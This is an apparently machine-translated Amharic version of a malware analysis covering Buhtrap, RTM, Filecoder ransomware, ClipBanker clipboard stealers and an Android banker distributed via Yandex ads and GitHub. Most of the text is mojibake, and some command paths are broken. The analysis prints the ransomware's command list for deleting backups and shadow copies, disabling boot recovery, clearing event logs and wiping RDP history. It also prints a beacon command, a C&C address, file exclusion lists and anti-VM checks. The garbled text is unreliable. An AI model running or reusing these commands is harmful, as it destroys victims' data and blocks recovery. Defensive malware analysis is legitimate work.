á áłáá á áĽááľ ááľáĽ á¨ááłáĽ áŁáááŤáá˝á ááááŁá á á ááľáá áá á¨ááááá¸áá á¨áľáŤ á°ááśá˝ áá áá áá˝ááᢠáá
á áááľ áŁáááľ áĽááľ ááŤáľ ááľáĽ á¨áłáá á áĄáľá á¨áłáááľá á áŽá˝ á áá°áŤá¨áľ á˛áŤá°áá á¨áá á¨á ááá˘
á¨Buhtrap á¨ááá áŽáľ á¨áá áá°á á ááľáá áá áľáá°ááá ááá áá ááá áľ áá˝ááᢠá¨RTM áŽáľ ááááľá á á°ááá¨á° ááá áá¨á á¨áááá˘
á áá ááĽá ááľáĽ á áĽáááš Yandex.Direct á á áá áá ááááá áĽáá´áľ áĽááłá°áŤáŠ áĽá á GitHub áá áĽááłáľá°áááą áĽááááááłááᢠááĽá á á°ááŽá á áá áá á´áááŤá áľááłá áá°áá°ááá˘
áĄá áľáŤá áĽá á áá˛á¤á áá° áľáŤ á°ááá°ááá˘
á¨áľáááľ áĽá á¨á°áááá˝ áá´
áá°áááá˝ á¨áá°ááąáľ á¨á°ááŤáŠ á¨á°ááá áááśá˝ á¨á፠áľáááľ áá´á áááŤáᢠá á áĽááá˝ á¨á°áá አááá á°ááŽá á áá áááá˝ á áááľ á¨á°ááŤáŠ ᨠGitHub áá¨ááťáá˝ ááľáĽ á°ááá ááá˘
á á°áááśáŁ áá¨ááťá á ááľ ááááľ á¨áá˝á á°ááŽá á áá ááá áááᣠáĽáąá á á°á°ááá á¨ááá¨áᢠGitHub á áá áŤáá፠áá á¨á°á°á¨á áááŚá˝á áłáŞá áĽáá˛ááá¨áą áľáááá áľáŁ áááá á á°áá°á áá ááľáĽ áá áĽáá°á°á°áŤá¨ áá¨áľ áĽáá˝áááᢠá°áááá á°ááŽá á áá ááá áĽáá˛áŤáááľ áááłáá á¨áá á áľáá áá á¨ááłá¨á blanki-shabloni24[.]ru á¨á°á°áá áľá ᨠáá˝ áľáŤ áá áááá˘
á¨áŁá˘áŤá ááľá áĽá ááá á¨á°ááŽá á áá áááá˝ áľáá˝ á ááľ á˝áá°-ááłáĽ áá¨á°áá - á ážá˝, á áĽááśá˝, áŽááľáŤáśá˝, ááááá˝, ááá° .... Buhtrap áĽá RTM áśááľáá áá°á á˛á á ááłáĽ áŁáááŤáá˝ áá á áá°ááá áĽááśá˝ áá áĽá á áá áĽáá°áá áááľ ááľáĽ áŤáľááŁá. á á á˛áą áááť ááľáĽ áŤáá áľááľ á°ááłáłá áá. áĽá¸áá áĽáŤá á°ááá áá° á áĽáááš áľá¨-áá˝ áĽáá´áľ áĽáá°á°á¨á° áá.
á˘áááá˝á
á áá áľá¨-áá˝ áá áŤá ááľ á˘áŤááľ á ááŤáł á°á ááá˝ á á°ááŽá á áá ááľáłáá፠á°áľá á áá áᢠá¨áá á áłá˝ á¨áŠá áá¤á ááłá ááá˘
https://blanki-shabloni24.ru/?utm_source=yandex&utm_medium=banner&utm_campaign=cid|{blanki_rsya}|context&utm_content=gid|3590756360|aid|6683792549|15114654950_&utm_term=ŃкаŃĐ°ŃŃ ĐąĐťĐ°Đ˝Đş ŃŃĐľŃĐ°&pm_source=bb.f2.kz&pm_block=none&pm_position=0&yclid=1029648968001296456
á¨á ááá áá áĽáá°ááłáŠáľ áŁáá á á áá á¨ááłáĽ áá¨á bb.f2[.]kz áá á°áá áᢠáŁááŽáš á á°ááŤáŠ áľá¨-áážá˝ áá ááłá¨áłá¸áá áἠáááľ áŤáľááááᣠááá á°ááłáłá á¨áááť ááłáá፠(blanki_rsya) áá áŤá¸áᣠáĽá á¨ááłáĽ á áŤáŤá ááá á¨á á áľáá á áááááśá˝ áá á¨á°áŤáŤá áá¸áᢠáŠá áá¤á á¨ááŤáłá¨á á°ááá á¨áĽáá á¨áłáá áĽááśá˝ ááááľ á¨áá°áááá âá¨áá¨áą á¨áá፠áá á¨á፠á á˝â áĽáŤáá áĽáá°á°á áá áŤáłáŤáᢠá¨áłá˝ áŤááľ áŁááŽá˝ á¨áłáŠáŁá¸á áŁá˘áŤáá˝ áĽá á°ááá á¨ááá áá ááá˝ áá¸áá˘
- á¨áá፠áá á¨á፠á á˝ á áááľ - bb.f2[.] kz
- á¨ááá áá - Ipopen[.] ru
- á¨áá°áá áŞáŤ á áŹáł ááá - 77metrov[.] ru
- á¨áľááááľ á á˝ - áŁáś-dogovor-kupli-prodazhi[.] ru
- á¨ááá áááľ á¤áľ á á¤áąáł - zen.yandex[.] ru
- á¨ááá á áŹáł - yurday[.] ru
- á¨ááá á¨áŽááľáŤáľ á ážá˝ - Regforum[.] ru
- á¨áŽááľáŤáľ á á˝ - assistentus[.] ru
- á¨ááá á áááłá áľááááľ - napravah[.] áŽá
- á¨áá áŽááľáŤáśá˝ ááááá˝ - avito[.] ru
ᨠblanki-shabloni24[.] ru áŁá˘áŤ ááá á¨áĽááł ááááá áááá á¨á°ááᨠááá áá˝ááᢠá á°áááśáŁ áá° GitHub á ááá áŤáá ááŽáá˝áá áá°áááľáá áŁá˘áŤ á¨áá áá ááľáłáá፠á ááá˝ ááĽá ááá á áááľááᢠá á°á¨ááŞá á áĽáááš á°ááŽá á áá áááá˝á áá° áá¨ááťá á¨á°áááľ áá°áá°á áá áĽáť ááᣠá áááťá áá áľ ááá áá˝ááᢠáĽá áá ᨠGitHub áá¨ááť áŁáś áá áá á°á ááá áŁáś EXE ááá áááᢠáľááá á áĽááá˝ ááľáłáááŤá á Yandex.Direct á áŠá áá°áá°á á¨ááá áĽáŤááá˝ ááá˝ á áᥠá¨ááłáĽ áŁáááŤáá˝ ááá á á áá˝á áŁá˘áŤáá˝ áá áá°áŤá¨áľ áá˝ááá˘
á ááá áᣠá áá ááááľ á¨á°á¨ááááľá á¨á°ááŤáŠ á¸ááá˝á áĽáááá¨áľá˘
á¨áá፠áľáá°á
á¨ááá á ááŁá á
á°ááŽá á áá áááťá á áĽá ááľ 2018 áááŁá°á áá á°áááŻá áĽá á áá˝áá áľ áá áá ááᢠááá áá¨ááť á GitHub áá á áá á¨ááá á áááᣠá¨áľáľáľáľ á¨á°ááŤáŠ á¨áááá á¤á°á°áŚá˝ áľáááľ áľáááá á¨áá ááľáá á ááá á°áá (á¨áá á áłá˝ áŤááá ááľá áááá¨áą)ᢠá¨ááľ áłáŞá áá áááááá á ESET á´áááľáŞ á˛á፠á¨áŁáá áááá ááź áĽáá°á°áá á¨ááŤáłá ááľáá á ááááᢠáĽáá°áááá¨áąáľ ᣠáá á GitHub áá áŤáá á¨áá፠áááľ á°ááááľ áá á áĽáŠ áááł ááááłáᢠá á¨áŤá˛áľ áá¨á¨áť áá á¨á°áá á¨áá á ááááŁáŁáľ áá á áá á¨ááááłá˝á á ááľ áá¨ááťá ᨠGitHub áľáá°ááá° á¨ááἠáłáŞá á áŤá áľáááá á¨á áááá˝ áá˝ááá˘
ááľá 1. á¨áááá áľáááľ á¨ááá á
á°á á°á¨á°á.
á¨áŽáľ ááá á¨ááľáá áá¨ááśá˝
áááťá á ááŤáł á¨ááľáá áá¨ááśá˝á á°á á ááᢠá ááłááśáš á¨á ááľ á áá á áá á¨áááá á¤á°á°áĽ á¨á°áá¨á á˛áá áá á á¨á°ááŤáŠ ááááá˝ á¨á ááľ áááť á áŁá áááá¸áá á áá áἠáá áááᢠá¨áá ááá á˘ááá áŚááŹá°áŽá˝ áľááłá á áá ááááľ áááľáŽážá˝á á ááá¨áá áĽá áááá ááááá˝ áááá á áá°á ááá áľáᢠáĽ.á¤.á . á ááĽáŠá᪠2019 áá¨á¨áť áá á áĽááá˝ á¨áá ááá áŤááá áŤá¸á á¨Google áŁáá¤áľááľ áá¨áá፠á°áá°ááŹáľ á áá áá áá áŤááá ááááá˝á ááá á áááŠá˘
á áááťá ááľáĽ á¨á°áłá°á ááá á¨ááľáá áá¨ááśá˝ áĽá á¨áááááŁá¸á á¨áááá á¤á°á°áŚá˝ á¨áá á áłá˝ áŁáá á áá á¨áĽ ááľáĽ á°áááá¨ááá˘
á¨ááá˝ á¨áááá á¤á°á°áŚá˝ áá áááááľ ááááľá¨áľ áĽááá
á á¨áŽáľ ááá á°áá°ááŹáśá˝ á°á á
áááᢠáá áĽááááš á¨ááľáá áá¨ááśá˝áŁ á GitHub áá¨ááť áŤáá°á¨ááá ááááá˝á á áááááᢠááá áá á¨TOV "MARIYA" á°áá°ááŹáľ á¨botnet ááĽá¨áľ á¨áááá áááá áááá¨á áĽá
á áá ááá
Win32/ááááŽá°á.Buhtrap
áľáŠá¨áłá˝áá á¨áłá á á¨ááááŞáŤá á áŤá á á˛áľ á¨á°ááá Win32/Filecoder.Buhtrap ááᢠáá á ááłááľ áá á¨áłá¸á á¨á´áá áááľáŽá˝ ááá ááᢠá ááááľ á¨á°á°áŤá¨á á á¨áŤá˛áľ - ááá˘áľ 2019 áá áᢠááŤáá°ááá ááŽááŤá á¨ááľáá áŁá ᪠á áá - á¨á áŤáŁá˘ áľáŤááŽá˝ áĽá á¨á ááłá¨ áá¨áĽ áá á°áŽá˝á ááááá áĽá á¨á°áááľá áááá˝ áŤááľáĽáŤáᢠá¨á˘áááŞáá˝á áááá˝á áááá á ááááŠá áľáááŤáááá á¨á áááá¨áĽ áááááľá áááŁáľ á áŤáľáááááᢠá ááľáŠáŁ á á¤áá áááĽááľ áá¨á¨áť áá âáśá¨áâá áá¨ááŤáᣠáĽá áŚááŹá°áŽá˝á áááááľ á˘áá ááá á˘áľáá´á áá ááá áá áááá˘
á á°áťá áá á áĽá áľáą ááĽáśá˝á ááááľá á Filecoder.Buhtrap ááľá áŤá á¨ááŤá°áá á á áá áá¨ááá˝á á¨áŤá áááľ á¨ááá á°ááŁáŁáŞáá˝ áááŻá¸á á¨áá˝á ááá áśááľááŽá˝á áááááľ á¨á°áá°á áá áá°áŤáᢠá¨ááá áá°áśá˝ á ááááľ á¨ááἠááł á áľá°áłá°á áľáááśá˝ (DBMS) áá¸áᢠá á°á¨ááŞá Filecoder.Buhtrap á¨áá¨á áááś áááá á áľá¸á᪠áááľá¨á á¨áááἠááľáłááť áááá˝á áĽá áá áŁá ááŤáá˝á áá°áááᢠáá áá áááľá¨á, á¨áá á áłá˝ áŤááá á¨áĄáľá áľááŞááľ áŤááą.
bcdedit /set {default} bootstatuspolicy ignoreallfailures
bcdedit /set {default} recoveryenabled no
wbadmin delete catalog -quiet
wbadmin delete systemstatebackup
wbadmin delete systemstatebackup -keepversions:0
wbadmin delete backup
wmic shadowcopy delete
vssadmin delete shadows /all /quiet
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientDefault" /va /f
reg delete "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers" /f
reg add "HKEY_CURRENT_USERSoftwareMicrosoftTerminal Server ClientServers"
attrib "%userprofile%documentsDefault.rdp" -s -h
del "%userprofile%documentsDefault.rdp"
wevtutil.exe clear-log Application
wevtutil.exe clear-log Security
wevtutil.exe clear-log System
sc config eventlog start=disabled
Filecoder.Buhtrap áľá áľá áŁá˘áŤ ááĽááá˝ áá¨á ááá°áĽá°áĽ á¨á°áá°á á áá á¨ááľáá áá IP Logger á áááááľ áá áááᢠáá á¨áľáĽáá ááľáአáááááľ á¨áááá á¨á¤áááá á°áááá˝á ááá¨áłá°á á¨áłá°á áááĄ-
mshta.exe "javascript:document.write('');"
á¨áááľá á áááá˝ á¨ááá¨áĄáľ á¨áśáľáľ á¨áááá ááááŽá˝ áá á¨áááááą á¨áá ááᢠá ááááŞáŤáŁ á¨áá¨á°ááľ á áĽáŤáá˝ áŤáá¸á áááá˝ á áá°áá°á áŠáᥠ.comᣠ.cmdᣠ.cplᣠ.dllᣠ.exeᣠ.hta, .lnk, .msc, .msi, .msp, .pif, .scr, .sys áĽá .á¨áááľ áá. á ááá°á á°á¨á ᣠáá áąáŤá á¨áá፠ááĽá¨ááááá˝á á¨áŤááŁá¸á ááá áááá˝ á¨áá á áłá˝ áŤáá áááá ááľáĽ á ááŤá°áąáá˘
.{ED7BA470-8E54-465E-825C-99712043E01C}
tor browser
opera
opera software
mozilla
mozilla firefox
internet explorer
googlechrome
google
boot
application data
apple computersafari
appdata
all users
:windows
:system volume information
:nvidia
:intel
áŚáľá°áᣠá¨á°áá°á á¨ááá áľáá˝á á¨áááľá á á¨á°ááá áá¸áᣠá¨áĽááá á ááŤá¨á á¨á¤áá áááĽááľ ááá áľáᢠáááአá¨áá á áłá˝ ááá§áᢠá ááá˝ áĽáá°ááłá¨á áĽááá áá áአáááłáá˝ áá˝á áĽáá˛á ፠áááľá¨á á¨áłááą áá¸á ᣠáá á áľááš á¨ááááľ áĽáááľá˘
boot.ini
bootfont.bin
bootsect.bak
desktop.ini
iconcache.db
ntdetect.com
ntldr
ntuser.dat
ntuser.dat.log
ntuser.ini
thumbs.db
winupas.exe
your files are now encrypted.txt
windows update assistant.lnk
master.exe
unlock.exe
unlocker.exe
á¨ááá ááľá ፠áá´
á áá´ á¨á°áá¸áᣠáááአáŁá 512-á˘áľ á¨RSA ááá áĽááľ áŤáááŤáᢠá¨ááŤá á¨áá ááá (á) áĽá ááąá (n) á á°á¨á áŽáľ 2048-á˘áľ á¨á áἠááá (á¨áá ááá áĽá ááąá)ᣠááἠá¨áłá¸á áĽá á¤á64 áŽáľ á¨á°áá°á አáá¸áᢠááá á°á áŤáá áŽáľ á áľáĽá 2 ááłáŤá.
ááľá 2. ᨠ512-á˘áľ RSA ááá áĽááľ á¨áááá¨áľ áá°áľ á¨áááľ-áŹá áá°áŁá á áá¤áľá˘
á¨áá á áłá˝ á¨ááᨠá¨áá ááá áŤáá ááá˝ á˝áá ááłá ááᣠáĽáąá á¨á¤áá áááĽááľ áá á¨á°áŤáŤáá˘
DF9228F4F3CA93314B7EE4BEFC440030665D5A2318111CC3FE91A43D781E3F91BD2F6383E4A0B4F503916D75C9C576D5C2F2F073ADD4B237F7A2B3BF129AE2F399197ECC0DD002D5E60C20CE3780AB9D1FE61A47D9735036907E3F0CF8BE09E3E7646F8388AAC75FF6A4F60E7F4C2F697BF6E47B2DBCDEC156EAD854CADE53A239
á¨á áĽáááš á¨á áἠááá á¨áá á áłá˝ ááá§áá˘
e = 0x72F750D7A93C2C88BFC87AD4FC0BF4CB45E3C55701FA03D3E75162EB5A97FDA7ACF8871B220A33BEDA546815A9AD9AA0C2F375686F5009C657BB3DF35145126C71E3C2EADF14201C8331699FD0592C957698916FA9FEA8F0B120E4296193AD7F3F3531206608E2A8F997307EE7D14A9326B77F1B34C4F1469B51665757AFD38E88F758B9EA1B95406E72B69172A7253F1DFAA0FA02B53A2CC3A7F0D708D1A8CAA30D954C1FEAB10AD089EFB041DD016DCAAE05847B550861E5CACC6A59B112277B60AC0E4E5D0EA89A5127E93C2182F77FDA16356F4EF5B7B4010BCCE1B1331FCABFFD808D7DAA86EA71DFD36D7E701BD0050235BD4D3F20A97AAEF301E785005
n = 0x212ED167BAC2AEFF7C3FA76064B56240C5530A63AB098C9B9FA2DE18AF9F4E1962B467ABE2302C818860F9215E922FC2E0E28C0946A0FC746557722EBB35DF432481AC7D5DDF69468AF1E952465E61DDD06CDB3D924345A8833A7BC7D5D9B005585FE95856F5C44EA917306415B767B684CC85E7359C23231C1DCBBE714711C08848BEB06BD287781AEB53D94B7983EC9FC338D4320129EA4F568C410317895860D5A85438B2DA6BB3BAAE9D9CE65BCEA6760291D74035775F28DF4E6AB1A748F78C68AB07EA166A7309090202BB3F8FBFC19E44AC0B4D3D0A37C8AA5FA90221DA7DB178F89233E532FF90B55122B53AB821E1A3DB0F02524429DEB294B3A4EDD
ááááš á 128-á˘áľ ááá AES-256-CBC á áá áá á¨á°áá°á አáá¸áᢠááĽáŤááłááą á¨á°áá°á ᨠááá á á˛áľ ááá áĽá á á˛áľ ááľáááŞáŤ áŹáá°á ááá áŤáᢠááá áá¨á á á°áá°á á¨á ááá áá¨á¨áť áá á°á¨ááŻáᢠá˘áááŞááľ á¨á°á°á¨ááá ááá á
áá¸áľ áĽááľáĽá˘
á¨á°áá°á አáááá˝ á¨áá¨á°áá áŤáľá á áá¸ááĄ
ᨠVEGA á áľááľ áĽá´áľ á á°á¨á᪠á¨ááá ááá áá¨á áá° ááááŞáŤá 0x5000 áŁááľ á°ááľáĽáŻáᢠááá á¨á˛ááŞááľ áá¨á á¨áá¨á°áá ááá
á áŤáá ááá áá á°áŤáááá˘
- á¨ááá áá á á áááŤá˝ ááá á áá á ᨠ0x5000 áŁááľ á¨áá áἠáááá á¨ááŤáłá ááááľ ááá
â AES key blob = ZlibCompress(RSAEncrypt(AES key + IVáŁá¨ááá¨á á¨RSA ááá áĽááľ ááá ááá))
- RSA key blob = ZlibCompress(RSAEncrypt(á¨ááᨠRSA á¨áá ááááŁá¨á ááŤáŤ áŽáľ ᨠRSA á¨á
áἠááá))
Win32/ClipBanker
Win32/ClipBanker á¨áŚááśá á áá¨á¨áť áĽáľá¨ áłá áłáľ ááááŞáŤ 2018 áľá¨áľ áŤáááá¨áĽ á¨á°á°áŤá¨ á áŤá ááᢠá¨áĽáą áá á¨á ááĽáĽ á°ááłáá áááśá˝ áá¨áłá°á áá ᣠáĽáą á¨áŞáľ áŚááłáá˝á á áľáŤáť áááááᢠááááŁáá¨á á¨áłáááá á¨áŞáľ áŚááł á áľáŤáť á¨áá°á á áá á¨áŚááŹá°áŽá˝ áá á°áĽá á ááłáá á áľáŤáť áá°áŤááᢠá¨áá¨áááá¸á ááááá˝ á áŚááľ ááá á áľáĽá á ááá áŠáᢠáŁá áŞá ááá°á á áĽá á áá á¨áááá áĽá¸áá áá´ á¨ááĽá¨ááá ááľá ፠ááᢠáŚááŹá°á á¨áŞáľ áŚááł á áľáŤáťáá˝ RC4 á áá áá á¨á°áá°á አáá¸áᢠááá cryptocurrencies BitcoinᣠBitcoin cashᣠDogecoinᣠEthereum áĽá Ripple áá¸áá˘
á°ááŽá á áá áá áá° á áĽáááš Bitcoin áŚááłáá˝ áĽá¨á°á°áŤá¨ á áá á¨á áľ áá áľ, áľáá˝ áá á áá° VTS á°ááłá, áá á á áááťá áľáŹáľ áá áĽááŁáŹá áááĽáŤá. á á°á¨ááŞáᣠáĽááá ááĽááśá˝ á¨ClipBanker áá á¨á°áŤáŤá áááá¸áá á¨ááŤáłá ááá ááľá¨á á¨ááá˘
Win32/RTM
á¨Win32/RTM ááá á ááá˝ 2019 ááááŞáŤ áá ááĽá áááľ á°á°áŤááˇáᢠRTM á áááľ á¨áŁáá áľáááśá˝ áá áŤááŁá ᨠá á´áá á¨á°áťá á¨áľáŽáá áŁá áŁáá ááᢠá 2017, ᨠESET á°ááŤááŞáá˝ áłáľááá
áĄá áľáŤá áŤá
áá°áá°á ááᣠá¨áá°ááľ á¨Buhtrap ááłáŞáŤáá˝ áá á¨ááááłá°á ááá¨á á GitHub áá ááááᢠáá° áĽáą ááŻá https://94.100.18[.]67/RSS.php?<some_id>
á¨áááĽááá á°á¨á áááááľ áĽá á ááĽáł áá° áá
á°á¨ áľááľáł ááŤááľ. á¨ááá°áá á°á¨á áŽáľ áááľ áŁá
áŞáŤáľá ááá¨áľ áĽáá˝ááá. á ááááŞáŤá áŠá áá¤áᣠRSS.php á¨Buhtrap backdoorá á ááĽáł á áá - áá
á¨áá á á á¨ááá áŽáľ á¨á°ááá á áá áŤáá áá á áŁá á°ááłáłá ááá˘
á¨áááááᣠá¨áĄá
áľáŤá á¨áá á á áá áĽá áááťáá˝á áĽááŤááᣠáĽá á á°ááŤáŠ áŚááŹá°áŽá˝ áá á¨áá°áłá°áŠáľ á°áĽááᢠá áá
ááłá áá ááá ááŠááľ á¨áááŁá á á á ááĽáł áá° áá
á°á¨ áľááľáł á°ááá áĽá á¨á°áááááá á¨á˛á¤áá¤á áá°ááŤáľ áá°áľ áá á¨á°ááá°áá áĽá
áľ á áá ááá.
ááá°ááᣠá áŁá ááľáĽáľáĽ áŁá
᪠RSS.php URL áá° áá áŤá áá°ááá ááᢠáĽáá° á°áááá á¨ááľááŁáľ á°áá á¨áĄá áĽáá°áá á ááááŁáľ áá áŤá á ááłááľ áá°áĽááá á°ááŁáŤá á áľáááᢠá¨áĄáľ áŤáá á áá á¨C&C á ááááá ááááľ ááá˘
á ááľáŽááľ/Spy.Banker
á¨áááááᣠá Android á ááľ á áŤá á GitHub áá¨ááť ááľáĽá á°áááˇáᢠá ááá á áááŤá ááľáĽ áá ááľ áá áĽáť áá á - á áłá 1, 2018. á GitHub áá á¨á°áá á á á°á¨ááŞáŁ ESET á´áááľáŞ áá áááá áá°áŤá¨áąá á¨ááŤáłá ááá ááľá¨á á ááááá˘
ááá á¨á°áľá°ááá°á áĽáá° á ááľáŽááľ áá°áá áŞáŤ áĽá á (á¤ááŹ) ááᢠá áŁá á¨á°á°á á ááᢠá°ááŽá á áá áŁá áŞá á á¤áᏠááľáĽ á ááá á˘áááŞááľ á¨á°á°á¨á JAR ááľáĽ á°á°áĽááᢠáá áá ááá á áá áá á RC4 á¨á°áá°á ᨠáááĄ-
key = [
0x87, 0xd6, 0x2e, 0x66, 0xc5, 0x8a, 0x26, 0x00, 0x72, 0x86, 0x72, 0x6f,
0x0c, 0xc1, 0xdb, 0xcb, 0x14, 0xd2, 0xa8, 0x19, 0xeb, 0x85, 0x68, 0xe1,
0x2f, 0xad, 0xbe, 0xe3, 0xb9, 0x60, 0x9b, 0xb9, 0xf4, 0xa0, 0xa2, 0x8b, 0x96
]
ááĽá¨ááááá˝á ááááľá á á°ááłáłá ááá áĽá á áááŞáá áĽá
á áá ááááᢠJAR á¨áááá á ááľáĽ ááᢠAPK_ROOT + image/files
. á¨ááá á¨ááááŞáŤááš 4 áŁááľ á˘áááŞááľ á¨á°á°á¨áá JAR ááááľ ááááᣠáá
á á¨ááááľ ááľáŠ á áá áá˛áŤáá ááááŤáá˘
áááá á˛ááŞááľ áŤá°á¨áá á ááᣠá áá˘áľ áááá á°áá°áá áłá - á¨áá
áá°á
- ááááŽáá áá áłáľ
- á á˝á áłá áá˝ áĽááłáá˝á áááłáľ
- á¨ááá¤áľ ááá ááŤáá˝á ááááľ
- áŞáááá
- á¨ááŁáŞáŤ ááἠááľá ፠áĽá á¤á ááááľ
- á áááá áááĽááľ á ááá áá
á¨áááááᣠá¨áŁáá á°áŤá°áá áá C&C á áááá áááááľ áľáá°áá áĽáá° ááľáŹ á¨áááá áťáá á°á á ááᢠá¨á°á°áá°áá ááá ᨠ@JonesTrader áááŤá á°á á áá ááááá á áá°áá°á áá á áľááľá áłááˇáá˘
áŁááŁáአá á ááľáŽááľ ááłáŞáŤ áá á¨áłáá á áááŹá˝áá˝ áááá áááᢠá áśááľ áĽááľ ááľáĽ á¨á°ááá áááá á¨á áá á¨áá áŤá áá. áááአáĽá á¨áŁáá á áááŹá˝áá˝áᣠá¨ááľáá áá ááĽááľ ááŽááŤáá˝á áĽáá° á ááá áĽá á˘á¤á áĽá á¨ááľá ፠á áááááśá˝á áŤáŤáľáłáá˘
MSIL/ClipBanker.IH
á¨áá áááť á áŤá áá á¨á°á°áŤá¨á á¨áá¨á¨áťá ááá á ááá˝ 2019 á¨ááŁá .NET Windows executable ááᢠá áĽááááš á¨á°á ááľ áľáŞáśá˝ á ConfuserEx v1.0.0 á¨áłá¸á áá¸áᢠáá áĽáá° ClipBankerᣠáá á áŤá á ááĽáĽ á°ááłáá áá áááᢠá¨áĽáą áᥠáĽá á áááľ ááŞááś ááááŹáá˝áŁ áĽáá˛áá á Steam áá á áážá˝ áá¸áᢠá á°á¨ááŞáᣠá¨Bitcoin á¨áá ááá áááá áááľá¨á á¨á áá ááá á áááááľá áá áááá˘
á¨áá¨áá¨áŤ áá´áá˝
ConfuserEx áá¨ááᣠááŁáá áĽá áá¨áá á áá¨áá¨á á¨áá°á á áĽá
á á á°á¨á᪠á°áá á¨áá¨-áŤáá¨áľ áááśá˝á áĽá á¨áášáá áá˝áá˝á á¨ááá¨áľ á˝ááłá áŤáŤáľáłáá˘
á á¨áášáá áá˝á ááľáĽ ááľáŤáąá ááá¨ááἠáááአá áĽáŽ á¨á°á°áŤáá á¨áááśááľ WMI á¨áľáĽáá ááľáá (WMIC) á áá áá á¨áŁáŽáľ áá¨áá ááá á¨á áá ááááĄ-
wmic bios
á¨á፠ááŽááŤá á¨áľáááá áá¤áľ áá°ááľáá áĽá ááá áááľá ááááá-VBOX ᣠVirtualBox ᣠXEN ᣠqemu ᣠbochs ᣠVMá˘
á¨á¸á¨-áŤáá¨áľ áááśá˝á áááááľ áááá á áá áá á¨áááśááľ á áľá°áłá°á ááłáŞáŤ (WMI) áĽáŤáá áá° áááśááľ á´áŞáŠáŞá˛ á´áá°á áááŤá ManagementObjectSearcher
á¤áá á á¨áá
á áłá˝ áĽáá°ááłá¨áᢠᨠbase64 á˛áŽáľ á¨áᣠá áá áĽáŞá áá
á áááľááá˘
ManagementObjectSearcher('rootSecurityCenter2', 'SELECT * FROM AntivirusProduct')
ááľá 3. á¨áá¨-áŤáá¨áľ áááśá˝á á¨ááá¨áľ áá°áľ.
á á°á¨ááŞáᣠáááá áľáááá áŤá¨áááŁá
á˝ááľ
áŤá ááá á¨áááá áľáŞáľ á áŤáą á
ááá˝ %APPDATA%googleupdater.exe
áĽá á google áá፠"á¨á°á°á á" áŁá
áŞá áŤááááᢠá¨ááŤá áááá áľáááŤáá˝ SoftwareMicrosoftWindows NTCurrentVersionWinlogonshell
á áááśááľ áááἠááľáĽ áĽá ááááąá áá¨ááŤá updater.exe
. á áá
ááááľ á°á ááá á áᣠááĽá áááá ááá¸ááá˘
á°ááŽá á áá áŁá áŞ
áá áĽáá° ááááŁáá¨áᣠáááá á¨á ááĽáĽ á°ááłáá áááśá˝ áá¨áłá°áá áĽá á¨ááŞááśá áŚááł á áľáŤáťáá˝á áááááᣠáĽá á˛áá á¨áŚááŹá°áŠ á áľáŤáťáá˝ á á ááą áá°áŤááᢠá¨áá á áłá˝ á áŽáą ááľáĽ áŁáá ááá áá á°ááľáá°á á¨áłáá á áľáŤáťáá˝ áááá á áá˘
BTC_P2PKH, BTC_P2SH, BTC_BECH32, BCH_P2PKH_CashAddr, BTC_GOLD, LTC_P2PKH, LTC_BECH32, LTC_P2SH_M, ETH_ERC20, XMR, DCR, XRP, DOGE, DASH, ZEC_T_ADDR, ZEC_Z_ADDR, STELLAR, NEO, ADA, IOTA, NANO_1, NANO_3, BANANO_1, BANANO_3, STRATIS, NIOBIO, LISK, QTUM, WMZ, WMX, WME, VERTCOIN, TRON, TEZOS, QIWI_ID, YANDEX_ID, NAMECOIN, B58_PRIVATEKEY, STEAM_URL
ááĽáŤááłááą á¨á áľáŤáť á áááľ á°ááłá áá°á á á áááá˝ á á. á¨STEAM_URL áĽá´áą á¨Steam áľáááąá áááĽááľ áĽá á áá áááááŁá¨áá°á áá á áááá˝ á ááľ ááľáĽ ááááá˝ áĽáá°ááťáááĄ
b(https://|http://|)steamcommunity.com/tradeoffer/new/?partner=[0-9]+&token=[a-zA-Z0-9]+b
á¨á¤ááľááá´á˝á áťáá
á°ááŽá á áá áá á áá áŁá ááŤá ááľáĽ á áľáŤáťáá˝á á¨áá°áŤáľ á á°á¨á᪠ᨠBitcoinᣠBitcoin Core áĽá Electrum Bitcoin áŚááłáá˝á á¨áá ááá¤á áááá˝ áŤááŁá ᨠááᢠááŽááŤá á¨WIF á¨áá ááá áááááľ plogger.orgá áĽáá° á¤ááľáá áťáá áá áááᢠáá áá áááľá¨á á¨áłá˝ áĽáá°ááłá¨á áŚááŹá°áŽá˝ á¨áá ááá ááἠáá° á¨á°á áá-ááŞá HTTP áŤáľá áŤáááá˘
ááľá 4. ᨠIP Logger áŽááśá á¨áá¤áľ ááἠáá.
á¨áŞáľ áŚááłáá˝á áááľááŁáľ áŚááŹá°áŽá˝ iplogger.orgá á áá°á áááᢠá ááľá áá áŁáá á¨255 ááá áá°áĽ ááááŤáľ áá° áá áá´ áłáá áá á áááŠáᢠUser-Agent
á á áá ááá áľá á áááá˝ ááľáĽ ááłáŤáᢠáŁá ááá¸á ááááá˝ ááľáĽ, áááá á¨áá¤áľ á áááá á á á¨áŁá˘á á°áááá ááľáĽ á°á¨áá˝áˇá DiscordWebHook
. á¨ááááá, áá
á¨á áŤáŁá˘ á°áááá á áŽáą ááľáĽ á¨áľááá áŚáł á áá°áá°á á. áá
á¨ááŤáááá°á áááአáá á ááááŁáľ áá áĽáá°áá áĽá á°ááááá ááŚááŹá°á ááá¨áŞáŤ áá˝á á°ááľá§áá˘
ááŽááŤá á áĽáľááľ áá áááá á¨ááŤáłá áá ááááľ á á. á¨áááľáŽá˝ ááá áááľ á¨iplogger.org áŠá áá¤áá˝á áŤáŤáľáłáᣠáĽá áááąá á¨áá á¨ááľ áá¨á á˛áᣠááᢠá¨áĽááá áŠá áá¤áá˝ áá ááą á áá¨á áĽáŤáᣠá ááŁááťá ááľá áŤáá áá á "DEV /" áááľááᢠáĽáá˛áá ConfuserExá á°á á áá áŤááłá¸á áľáŞáľ á ááá°áááŁá¨áá áŠá áá¤á á°ááŁá DevFeedbackUrl ááŁááᢠá á á¨áŁá˘á á°áááá áľá áá á áááľá¨áľ áŚááŹá°áŽá˝ á¨ááľá ፠áŚááłáá˝á áááľá¨á á áá á áááááľ Discord áĽá á¨áľá ááĽáá áľáááąá ááá áá áĽá áľ áĽááłáá¸á áĽáááááá˘
áá°áá°ááŤ
